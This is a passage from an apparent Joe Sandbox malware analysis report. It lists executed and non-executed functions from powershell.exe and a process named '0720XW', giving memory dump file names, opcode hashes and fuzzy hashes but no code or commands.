Snapshot File: hcaresult_15_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3c89c3fadbf1ddf5ae938cd726aedb728abcf20efd58ed097b3951c9b3eb774
Instruction ID: 1fb6880be43c5c1c0086ba7bdc0abec73988cd0ae2d18a6573212663614b3760
Opcode Fuzzy Hash: d3c89c3fadbf1ddf5ae938cd726aedb728abcf20efd58ed097b3951c9b3eb774
Instruction Fuzzy Hash: D721E63190CB4C8FEB59DFAC9C4A7E97BE0EB96321F04816BD049C7152DA74941ACB91

Function 00007FFAACD740BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1574750305.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39d23430cf20f06695f621359d826bda0023a58dbb17470b7746eb483ba0bfc
Instruction ID: 10e6a5db917a48293e7115803c7a7a7bf6431ce46139307be0e5c9b78a18e5a5
Opcode Fuzzy Hash: a39d23430cf20f06695f621359d826bda0023a58dbb17470b7746eb483ba0bfc
Instruction Fuzzy Hash: D1210963B0EAA78FF3A6EB1C84551746EC1DF52210B4940BBD46DC75D2CE38DC088B81

Function 00007FFAACCAA084 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1573969962.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad24c1af4af53bc1afbd05699346efba5d7c47ce0cb54c03cddc9670192ad27a
Instruction ID: e13096c97fa8695d758068a4b1357c21d7ea457e1e60154080d1925c5e22d56d
Opcode Fuzzy Hash: ad24c1af4af53bc1afbd05699346efba5d7c47ce0cb54c03cddc9670192ad27a
Instruction Fuzzy Hash: 32216AB3C0EA878FF701EF29945A0F53FD0EF22A51B0401B6D04E97013EE15585A8AC1

Function 00007FFAACD743BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1574750305.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe5d3df43675009473fd80a6cc0b32074801772ae3a720621fd92a31298d8ca
Instruction ID: b022df5064b5d73edc4a1779512bf21b2e89f9d844e58db0750b96527ba9c882
Opcode Fuzzy Hash: 1fe5d3df43675009473fd80a6cc0b32074801772ae3a720621fd92a31298d8ca
Instruction Fuzzy Hash: 4B110272A0E6A58FF7A6D72C94545B87FD0EF0222474940FAD06DC7492DE28EC188BC1

Function 00007FFAACCA33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1573969962.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 141d00dcf02e0b8f29e4104d0b8054a5580f9ba0704c2e0073df697dd715e98f
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 1D01447115CB088FD744EF0CE455AA5B7E0FB99364F10056DE58AC3661DA26E882CB45

Non-executed Functions

Function 00007FFAACCA8995 Relevance: 5.1, Strings: 4, Instructions: 144COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFAACCA89C9
O_^, xrefs: 00007FFAACCA8A2A
O_^, xrefs: 00007FFAACCA8A6A
O_^, xrefs: 00007FFAACCA8AC2

Memory Dump Source

Source File: 0000000F.00000002.1573969962.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^
API String ID: 0-109995703
Opcode ID: 4b7602be491c609b15f546d87684b3332082b10a2bbb9bf73bd342b6b187f01a
Instruction ID: 5b7087c059e731deee402605ba544a1e6cd4613a626de8ded62d5cbe3eb7c108
Opcode Fuzzy Hash: 4b7602be491c609b15f546d87684b3332082b10a2bbb9bf73bd342b6b187f01a
Instruction Fuzzy Hash: FF41C19290F7C38FF35A4B2948691A12FE2EF63765B0D41F6C08D8B193ED09594A83D2

Function 00007FFAACCA89FA Relevance: 5.1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFAACCA89FA
O_^, xrefs: 00007FFAACCA8A2A
O_^, xrefs: 00007FFAACCA8A6A
O_^, xrefs: 00007FFAACCA8AC2

Memory Dump Source

Source File: 0000000F.00000002.1573969962.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^
API String ID: 0-109995703
Opcode ID: 5131eef545c4dcfe4e5023b824ab2b3714bea5700b36527026dab429daa20bcd
Instruction ID: 011d637cd5357481498942496ab090a832c1ec6dbcd036c01eaef22121d3cda8
Opcode Fuzzy Hash: 5131eef545c4dcfe4e5023b824ab2b3714bea5700b36527026dab429daa20bcd
Instruction Fuzzy Hash: 1E31E693A0E7C3CBF75A871948691E12FD2EF6376A70941F6C08D8A583EC19AD4A42D1

Analysis Process: powershell.exePID: 1836, Parent PID: 7300COMMON

Executed Functions

Function 00007FFAACD730E9 Relevance: .7, Instructions: 661COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1775353116.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b89de973505059b05ebacda86ad6b82fd4f74744ab4946b46037d2e305cd1c03
Instruction ID: 6ac85cf49364e92cb66f33a55bfa07b96e6490dc7969c7e71a41318ac1dd7da8
Opcode Fuzzy Hash: b89de973505059b05ebacda86ad6b82fd4f74744ab4946b46037d2e305cd1c03
Instruction Fuzzy Hash: D1125462A0EB998FF3A6976C58591B07FD1EF97220B0841FBD49CC7193DD28DC0A8391

Function 00007FFAACD76605 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1775353116.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97cfa528e391d10fec0224009ad666eb3420e43bc9b14f334d6b1aa429ee3fc3
Instruction ID: 0c7a7758f08095acea688c98682081270c035a68dbb656da0b3e4e254a8a8708
Opcode Fuzzy Hash: 97cfa528e391d10fec0224009ad666eb3420e43bc9b14f334d6b1aa429ee3fc3
Instruction Fuzzy Hash: B2D15A75E0EB9A8FF765A76848555B5BFA0EF46210B0801FEE45DC70D3EA28DC0AC391

Function 00007FFAACD73360 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1775353116.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 156700386bcea97536a7cca988f2c2f51bde41ce892a75737928bb392fee9c05
Instruction ID: 433ecb60d7df81e214fe6558a713752a9da1974e7a9351780df386e7959f4eef
Opcode Fuzzy Hash: 156700386bcea97536a7cca988f2c2f51bde41ce892a75737928bb392fee9c05
Instruction Fuzzy Hash: 0A513462B0EBAA8FF3AA976C58952703AD1EF96310B0841BEC45DD7193DC39DC0983C1

Function 00007FFAACD74073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1775353116.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a51964d9c072022db55b2497426bba46487b8542343af279038762ecac694512
Instruction ID: a7e4479ad89fb5a509e728058278201f4263726881eb861e1d84d8d040689451
Opcode Fuzzy Hash: a51964d9c072022db55b2497426bba46487b8542343af279038762ecac694512
Instruction Fuzzy Hash: B9513622B0DA968FF79AEB2C84116747BD2DF96220B4840BBC15DC7193DE34EC098781

Function 00007FFAACD74370 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1775353116.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b38f8c4a5a29bef7d2f39566b465aece3213783bb3c801ae19816f815bde153
Instruction ID: 35d7e8d53d3dba36f08ad7cedce70383417ff22dfe66f8ed47b84a83c1795a98
Opcode Fuzzy Hash: 6b38f8c4a5a29bef7d2f39566b465aece3213783bb3c801ae19816f815bde153
Instruction Fuzzy Hash: 03413832B0EA598FF7A6D76C94105B47BD1EF82220B4844BED05DC7483EE24EC1887C1

Function 00007FFAACB8EAA8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1772761682.00007FFAACB8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacb8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f048ba6117c1daa0c74de1d9de954d81a597668c390f67002be71b17e1167ed
Instruction ID: 7199dd25c19654ff79f0e5f22e420f170b4b170af6a89088b492f45e31437381
Opcode Fuzzy Hash: 4f048ba6117c1daa0c74de1d9de954d81a597668c390f67002be71b17e1167ed
Instruction Fuzzy Hash: 5341177140EBC48FE7569B38D8959523FF0EF57220B1506DFE088CB1A3D625E84AC7A2

Function 00007FFAACCA97A9 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1774156691.00007FFAACCA5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacca5000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 965ab22a8b1672fc6cbb2dafaf1e3f477813a1e22481c50cd26e7d74ba895d63
Instruction ID: 87c3c524129d39c539137c1294e614b1eed5f8c531a68934e1a14d7a192bf064
Opcode Fuzzy Hash: 965ab22a8b1672fc6cbb2dafaf1e3f477813a1e22481c50cd26e7d74ba895d63
Instruction Fuzzy Hash: A931B37091CB4C8FDB1CDF4CA80A6A97BE0FB99721F00422FE449D3251CB71A8558BC2

Function 00007FFAACD740BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1775353116.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39d23430cf20f06695f621359d826bda0023a58dbb17470b7746eb483ba0bfc
Instruction ID: 10e6a5db917a48293e7115803c7a7a7bf6431ce46139307be0e5c9b78a18e5a5
Opcode Fuzzy Hash: a39d23430cf20f06695f621359d826bda0023a58dbb17470b7746eb483ba0bfc
Instruction Fuzzy Hash: D1210963B0EAA78FF3A6EB1C84551746EC1DF52210B4940BBD46DC75D2CE38DC088B81

Function 00007FFAACCAA4BB Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1774156691.00007FFAACCA5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacca5000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3b3fda5a0653cff31381560af3de49c8478fdd776b680156f81e5baeb8a1668
Instruction ID: 386fe51ed863ecb81fd3ac6d491a0539ade98661f07169dd85eab3040351c126
Opcode Fuzzy Hash: d3b3fda5a0653cff31381560af3de49c8478fdd776b680156f81e5baeb8a1668
Instruction Fuzzy Hash: 13219271908A0C8FDB58DF9CD84A7F97BE1EB95321F00812FD40DD3251D670A859CB91

Function 00007FFAACD743BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1775353116.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe5d3df43675009473fd80a6cc0b32074801772ae3a720621fd92a31298d8ca
Instruction ID: b022df5064b5d73edc4a1779512bf21b2e89f9d844e58db0750b96527ba9c882
Opcode Fuzzy Hash: 1fe5d3df43675009473fd80a6cc0b32074801772ae3a720621fd92a31298d8ca
Instruction Fuzzy Hash: 4B110272A0E6A58FF7A6D72C94545B87FD0EF0222474940FAD06DC7492DE28EC188BC1

Function 00007FFAACCA33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1774156691.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 141d00dcf02e0b8f29e4104d0b8054a5580f9ba0704c2e0073df697dd715e98f
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 1D01447115CB088FD744EF0CE455AA5B7E0FB99364F10056DE58AC3661DA26E882CB45

Function 00007FFAACCAA0FB Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1774156691.00007FFAACCA5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacca5000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccae52029f048af1bea327369f3a2704f6a0ffe40846c7f5b077904a644c8e89
Instruction ID: a3aaa54e5fdc46364c08caa10a3a08b3e1084a533344f95bc9f70d9d20dc8aaa
Opcode Fuzzy Hash: ccae52029f048af1bea327369f3a2704f6a0ffe40846c7f5b077904a644c8e89
Instruction Fuzzy Hash: 6EF0FC76519B8CCFD745EF1C98590E57FD0FFA6611B0401BBD14CC7161EA21884C8BD1

Non-executed Functions

Function 00007FFAACCA895B Relevance: 6.4, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFAACCA8A12
O_^, xrefs: 00007FFAACCA8A22
O_^, xrefs: 00007FFAACCA8AC9
O_^, xrefs: 00007FFAACCA89C2
O_^, xrefs: 00007FFAACCA8A62

Memory Dump Source

Source File: 00000011.00000002.1774156691.00007FFAACCA5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacca5000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^$O_^
API String ID: 0-2660881393
Opcode ID: 74fb8f0d7051cf51bcf4038a779d27b34e31b299687458f6d972d03e53788162
Instruction ID: 7a0d0fd78f3343e549b1a8b22ffd52cf1744517e2e7138423db979a6c9bada00
Opcode Fuzzy Hash: 74fb8f0d7051cf51bcf4038a779d27b34e31b299687458f6d972d03e53788162
Instruction Fuzzy Hash: 9B41A29390F7C38FF35A86244C791A16FD2EF63A5970951F6C08D8B583ED09694A82C2

Function 00007FFAACCA8BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

Strings

O_^I, xrefs: 00007FFAACCA8C7A
O_^F, xrefs: 00007FFAACCA8C72
O_^5, xrefs: 00007FFAACCA8BFA
O_^8, xrefs: 00007FFAACCA8C12
O_^K, xrefs: 00007FFAACCA8C8A

Memory Dump Source

Source File: 00000011.00000002.1774156691.00007FFAACCA5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacca5000_powershell.jbxd

Similarity

API ID:
String ID: O_^5$O_^8$O_^F$O_^I$O_^K
API String ID: 0-1229253136
Opcode ID: 92e7fbfb13da5e800eceb8c66b9ccec250adf28edc717261fbac71b4bbde8d79
Instruction ID: 8d4a4dbc85a1cae7ed51deec08689f0e5b75691706d66befb835a8c92f5269ab
Opcode Fuzzy Hash: 92e7fbfb13da5e800eceb8c66b9ccec250adf28edc717261fbac71b4bbde8d79
Instruction Fuzzy Hash: 5B2104B7B251169E92017B7EB8099E87BC4CFC467A34952F2D19D8F603DE14608B8998

Function 00007FFAACCA89F3 Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFAACCA8A12
O_^, xrefs: 00007FFAACCA8A22
O_^, xrefs: 00007FFAACCA8AC9
O_^, xrefs: 00007FFAACCA8A62

Memory Dump Source

Source File: 00000011.00000002.1774156691.00007FFAACCA5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaacca5000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^
API String ID: 0-934926442
Opcode ID: 80599f31b43016911a4005cd03ea6d8c56fd01f12eacc96f76986026690d7295
Instruction ID: 3192b6616ac2ddbfb8e8bd62ca75e6366aa434eab118b16128fcc399f8ab3ac1
Opcode Fuzzy Hash: 80599f31b43016911a4005cd03ea6d8c56fd01f12eacc96f76986026690d7295
Instruction Fuzzy Hash: E331B5D3A0EBC38BF75A87294C6A1A26FD2EF6366970D42F1C09D4E543EC156D4742C1

Analysis Process: 0720XWPID: 336, Parent PID: 932COMMON

Executed Functions

Function 00007FFAACCD21D1 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAACCD2292

Memory Dump Source

Source File: 00000016.00000002.1823755616.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaaccd0000_0720XW.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: cab39d5b6a390954728389ab421ef91a6039f2a1f4175b8cba303cedd66dc7c7
Instruction ID: a8623c1babcb89771ab559e2482750e860024c66e98bf1cda5779ce222c46560
Opcode Fuzzy Hash: cab39d5b6a390954728389ab421ef91a6039f2a1f4175b8cba303cedd66dc7c7
Instruction Fuzzy Hash: 96514451A0E6C98FE786AB788865675BFD5DF97214B0805FBE0CDC7193ED089C0AC382

Function 00007FFAACCD07FA Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

<M_^, xrefs: 00007FFAACCD0801

Memory Dump Source

Source File: 00000016.00000002.1823755616.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaaccd0000_0720XW.jbxd

Similarity

API ID:
String ID: <M_^
API String ID: 0-1376500734
Opcode ID: def880b9aee42e1732955f9a2c50ac6574b64195d4f7ee53102dd2f0dc457f3c
Instruction ID: b577871bbb8dadc6c1c343315afe2ef8a7714e9fefd2e1b7dad413c9839e7b06
Opcode Fuzzy Hash: def880b9aee42e1732955f9a2c50ac6574b64195d4f7ee53102dd2f0dc457f3c
Instruction Fuzzy Hash: 06512AE565868A4FE301F73CD45A9F8BFA1EF8921078045F6D40DC33D7DE24A8498792

Function 00007FFAACCD0588 Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAACCD2292

Memory Dump Source

Source File: 00000016.00000002.1823755616.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaaccd0000_0720XW.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 85d147de869982eb030a0327dbf94aa9716e311135805dc797b2bb615beafe12
Instruction ID: fe83c6a9a78574f177e9a98599b5092661459dbcd5e64ffd99f15f66332baa2f
Opcode Fuzzy Hash: 85d147de869982eb030a0327dbf94aa9716e311135805dc797b2bb615beafe12
Instruction Fuzzy Hash: 3731E861B1C9494FE798EB3CD46A779B7C6EF99310F0405BAE04EC3293DE249C068381

Function 00007FFAACCD0B31 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

6, xrefs: 00007FFAACCD0B62

Memory Dump Source

Source File: 00000016.00000002.1823755616.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaaccd0000_0720XW.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-1452363761
Opcode ID: 1eb2d438a2e51929502884ba575d92af77b44fab162fd798430518b3eaf4f0d8
Instruction ID: 368ec7cd04466c8cd6661308700af1cb0c462612538bd809b2aa944a3e7ea61e
Opcode Fuzzy Hash: 1eb2d438a2e51929502884ba575d92af77b44fab162fd798430518b3eaf4f0d8
Instruction Fuzzy Hash: C831C7A1A18A499FF785BBBC981A7BC76D5EF99301F0441BAE40DC3293DE68D8058381

Function 00007FFAACCD1729 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1823755616.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaaccd0000_0720XW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a3a20f7e9b97e79e93305b42429144456cbd88770026b0ee67e0c89dc27ba1
Instruction ID: 538bc2cb6110a90fcf202364da84a4f04c45c5e84608b037934907770c920c9a
Opcode Fuzzy Hash: a3a3a20f7e9b97e79e93305b42429144456cbd88770026b0ee67e0c89dc27ba1
Instruction Fuzzy Hash: 8291A565B299499FEB94FB78D45D7BC7692FF89310B8044B9E80EC32C2DF2C98158750

Function 00007FFAACCD0C9E Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1823755616.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaaccd0000_0720XW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd7eeee7c23ec807ea57b2e755a678a16e7f09b6be068ef619cd269c602791fe
Instruction ID: 1026c9dc0413147cd4055a55fc8b02b5e7990bf55e7cac488f0941b9d39b0a20
Opcode Fuzzy Hash: dd7eeee7c23ec807ea57b2e755a678a16e7f09b6be068ef619cd269c602791fe
Instruction Fuzzy Hash: 07512662A0EAC64FE357AB3C88166787FE1DF97210B0840FBD08DC7193DD589C068392

Function 00007FFAACCD09E1 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1823755616.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaaccd0000_0720XW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 910ea3ec54c7942b8a45d0ff4a7d94f7ee700599bcb3fd570848bc13a4c2c1f3
Instruction ID: ebd75cc9bac320bc8902cd9cfdfa87b5298c01bb5932c506ad47befc4c02bc10
Opcode Fuzzy Hash: 910ea3ec54c7942b8a45d0ff4a7d94f7ee700599bcb3fd570848bc13a4c2c1f3
Instruction Fuzzy Hash: 0931A0B1A18A4D8FEB44EB78C4597FDBBA2FF98310F5045B9D00DD3286CE38A8458781

Function 00007FFAACCD2381 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1823755616.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaaccd0000_0720XW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa62f95e414a4832524dc2aa64383193746a9640d3d44a289b47d91f21b1f1f
Instruction ID: 07e76daff288f97013cd37e7c4d7ec75d7deaadb67bb929d70428d3a2ff95fd3
Opcode Fuzzy Hash: 3fa62f95e414a4832524dc2aa64383193746a9640d3d44a289b47d91f21b1f1f
Instruction Fuzzy Hash: 59115961A0D7854FF386AB2CA8456717FE0DF9B320B0801E7E88CC70A2F908ED9583C1

Function 00007FFAACCD1648 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1823755616.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaaccd0000_0720XW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ede321878f5d517729b5b052d758ac493de0a696637bee146decf9e13559ffa3
Instruction ID: f74c99d536a9ea9d2acac2d15de6353d3d312c468520180975ca4076b6b29e08
Opcode Fuzzy Hash: ede321878f5d517729b5b052d758ac493de0a696637bee146decf9e13559ffa3
Instruction Fuzzy Hash: AC118462E2440F8FE744DB98D8556FDFBB1FF89220F8041B6D00ED3195DE25981A4790

Non-executed Functions

Function 00007FFAACCD06FA Relevance: 7.6, Strings: 6, Instructions: 116COMMON

Download Yara Rule

Strings

M_^j, xrefs: 00007FFAACCD072A
M_^|, xrefs: 00007FFAACCD0772
M_^^, xrefs: 00007FFAACCD06FA
M_^~, xrefs: 00007FFAACCD077A
M_^h, xrefs: 00007FFAACCD0722
=M_^, xrefs: 00007FFAACCD0701

Memory Dump Source

Source File: 00000016.00000002.1823755616.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaaccd0000_0720XW.jbxd

Similarity

API ID:
String ID: =M_^$M_^^$M_^h$M_^j$M_^|$M_^~
API String ID: 0-1553104472
Opcode ID: 2ea07743f23930f49c066e850929b41ed883bbc592b9a8462d58f6a1ca53cba2
Instruction ID: 9a3cc640fda49d957cffdc7c15cfe137939dbf4e5cb9101b312e3700b94cf8d0
Opcode Fuzzy Hash: 2ea07743f23930f49c066e850929b41ed883bbc592b9a8462d58f6a1ca53cba2
Instruction Fuzzy Hash: CD31C6F7A4D4569EE20337BCB4459EC3BC19F8176874A57B2D0ACCE0C39F58608A49D9

Analysis Process: 0720XWPID: 1008, Parent PID: 932COMMON

Executed Functions

Function 00007FFAACCA21D1 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAACCA2292

Memory Dump Source

Source File: 0000001C.00000002.2015778793.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffaacca0000_0720XW.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 42080126ea3cc4e9a94827592d7eda61ae844ff1a07d4cd596bcc437f6a82399
Instruction ID: 1557e46b52a99fd48f9109dbf1425e16dbded50ae502d72b8824edd9021d45ee
Opcode Fuzzy Hash: 42080126ea3cc4e9a94827592d7eda61ae844ff1a07d4cd596bcc437f6a82399
Instruction Fuzzy Hash: B651565161E6C54FD386AB788869675BFD5DF87214B0805FAE0CDC7193ED189C0AC382

Function 00007FFAACCA07FA Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

<P_^, xrefs: 00007FFAACCA0801

Memory Dump Source

Source File: 0000001C.00000002.2015778793.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

